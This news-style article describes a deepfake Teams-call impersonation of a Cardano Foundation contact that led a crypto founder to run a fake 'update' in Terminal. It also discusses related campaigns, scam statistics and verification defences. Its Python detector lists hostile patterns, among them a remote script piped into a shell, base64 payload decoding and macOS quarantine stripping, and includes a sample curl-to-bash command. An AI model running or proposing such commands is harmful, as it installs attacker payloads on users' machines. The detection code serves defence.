A crypto founder experienced a security breach after joining what seemed like a legitimate Microsoft Teams call with Pierre Kaklamanos, a known contact from the Cardano Foundation. The impostor used Pierre’s name to initiate a conversation about Atrium and sent an invite that appeared normal. On the call, the attacker replicated Pierre’s face and voice convincingly, accompanied by two other supposed foundation members.
When technical issues forced him off the call, he encountered a prompt claiming his Teams software was outdated and needed to be reinstalled via Terminal. He ran the command, then shut down his laptop to preserve battery life, a step that fortunately limited the damage.
Despite being technically adept, the founder fell victim because the attack's context was so convincing. Social engineering exploits familiarity, and historically it required either compromising an account or building rapport over time. Now, however, the video call itself, long treated as trusted proof of identity, can be convincingly mimicked.
In February and March 2026, Microsoft documented phishing campaigns involving malicious files disguised as workplace applications like msteams.exe and zoomworkspace.clientsetup.exe. These attacks simulated legitimate Teams and Zoom workflows. Additionally, Microsoft warned of “ClickFix”-style prompts targeting macOS users, asking them to input commands into Terminal. These threats targeted browser passwords, crypto wallets, cloud credentials, and developer keys.
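ClickFix-style lures share recognizable red flags: a remote script piped straight into a shell, an obfuscated payload decoded inline, or macOS quarantine attributes stripped from a downloaded file. As a minimal illustrative sketch (the patterns and function names below are my own, not drawn from Microsoft's advisory, and real detection requires far more than regexes):

```python
import re

# Hypothetical red-flag patterns seen in paste-into-Terminal lures
# (illustrative heuristics only, not a complete or authoritative list).
SUSPICIOUS_PATTERNS = [
    r"curl\s+[^|]*\|\s*(ba)?sh",              # pipe a remote script into a shell
    r"base64\s+(-d|--decode)",                # decode an obfuscated payload
    r"xattr\s+-d\s+com\.apple\.quarantine",   # strip macOS quarantine flag
    r"osascript\s+-e",                        # inline AppleScript execution
    r"chmod\s+\+x\s+/tmp/",                   # mark a dropped file executable
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if a pasted command matches any known lure pattern."""
    return any(re.search(p, command) for p in SUSPICIOUS_PATTERNS)

print(looks_like_clickfix("curl -s https://example.com/fix.sh | bash"))  # True
print(looks_like_clickfix("brew upgrade microsoft-teams"))               # False
```

The broader lesson holds regardless of tooling: no legitimate software update asks a user to paste shell one-liners from a web prompt.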
Google Cloud’s Mandiant unit reported a similar attack structure in the crypto space involving a compromised Telegram account, spoofed Zoom meetings, and deepfake-style executive videos. While they couldn’t verify if an AI model generated these videos, they confirmed the use of fake meetings and AI tools for social engineering.
On April 24, Pierre Kaklamanos publicly acknowledged on X that his Telegram account had been hacked, warning others not to engage with it to avoid falling victim to similar scams. The attacker had used the compromised account to suggest rescheduling the meeting on Google Meet, maintaining the ruse after the call and signaling an ongoing campaign.
The incident highlights several stages of the scam:
– **Initial Outreach:** The impostor reached out about Atrium to propose a call, trading on past interactions to establish trust.
– **Meeting Setup:** A Microsoft Teams invite was sent, utilizing familiar business workflows.
– **Live Call:** The attacker used deepfake techniques to replicate Pierre’s appearance and voice, reducing suspicion.
– **Call Disruption:** Technical issues were simulated to prompt the victim to install a fake update through Terminal.
– **Fake Update Prompt:** A software update message was displayed, exploiting familiarity with routine app fixes.
– **Command Execution:** The victim executed malicious commands before shutting down his laptop.
– **Post-call Follow-up:** The attacker continued interacting as Pierre, maintaining credibility for future attempts.
OpenAI’s launch of its 4o image generation model in March, capable of producing “precise, accurate, photorealistic outputs,” underscores the heightened risk. This advancement could enable more convincing deepfakes, elevating the threat level.
The World Economic Forum noted that generative AI lowers phishing barriers by creating credible deepfake audio and video. INTERPOL identified financial fraud as a rapidly evolving transnational crime in March 2026, highlighting impersonation tools like deepfake videos and chatbots.
Chainalysis reported crypto scams reached $17 billion in 2025, with impersonation scams increasing by 1,400% year over year. AI-enabled scams generated revenue four times greater than traditional methods, driven by high-value targets, fast settlement rails, and informal communication practices in the crypto world.
Zoom announced a partnership on April 17 to enhance meeting security through human verification tools like “Verified Human” badges and “Deep Face Waiting Rooms.” Gartner predicts that by 2027, half of enterprises will invest in disinformation-security products or TrustOps strategies, compared to less than 5% today.
In an optimistic scenario, widespread adoption of verification tools increases friction for attackers. However, if AI-generated impersonation advances faster than defenses, relationship hijacking could become routine, with each breach feeding the next scam.
Successful mitigation involves verifying sensitive requests across multiple channels using known phone numbers, hardware keys, shared passphrases, or internal systems. Conversely, reliance on video calls as identity proof remains a vulnerability if deepfake and impersonation tools continue to improve without corresponding defense enhancements.
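The shared-passphrase check mentioned above can be made phishing-resistant with a simple challenge-response over a second channel, so the passphrase itself is never spoken aloud where a deepfake caller could capture it. A minimal sketch, assuming both parties provisioned a passphrase in advance (all names here are hypothetical):

```python
import hashlib
import hmac
import secrets

def make_challenge() -> str:
    # Fresh random nonce, sent over a second channel
    # (e.g. a text to the contact's known phone number).
    return secrets.token_hex(16)

def respond(shared_passphrase: str, challenge: str) -> str:
    # The contact proves knowledge of the passphrase without revealing it.
    return hmac.new(shared_passphrase.encode(), challenge.encode(),
                    hashlib.sha256).hexdigest()

def verify(shared_passphrase: str, challenge: str, response: str) -> bool:
    expected = respond(shared_passphrase, challenge)
    # Constant-time comparison to avoid leaking information via timing.
    return hmac.compare_digest(expected, response)

# Usage: the founder texts a challenge to the real Pierre's known number;
# only someone holding the passphrase can compute the matching response.
challenge = make_challenge()
answer = respond("our-prearranged-passphrase", challenge)
print(verify("our-prearranged-passphrase", challenge, answer))      # True
print(verify("our-prearranged-passphrase", challenge, "deadbeef"))  # False
```

The design point is that the secret never transits the suspect channel: even a perfect audio-visual impersonation cannot answer a fresh challenge without the passphrase.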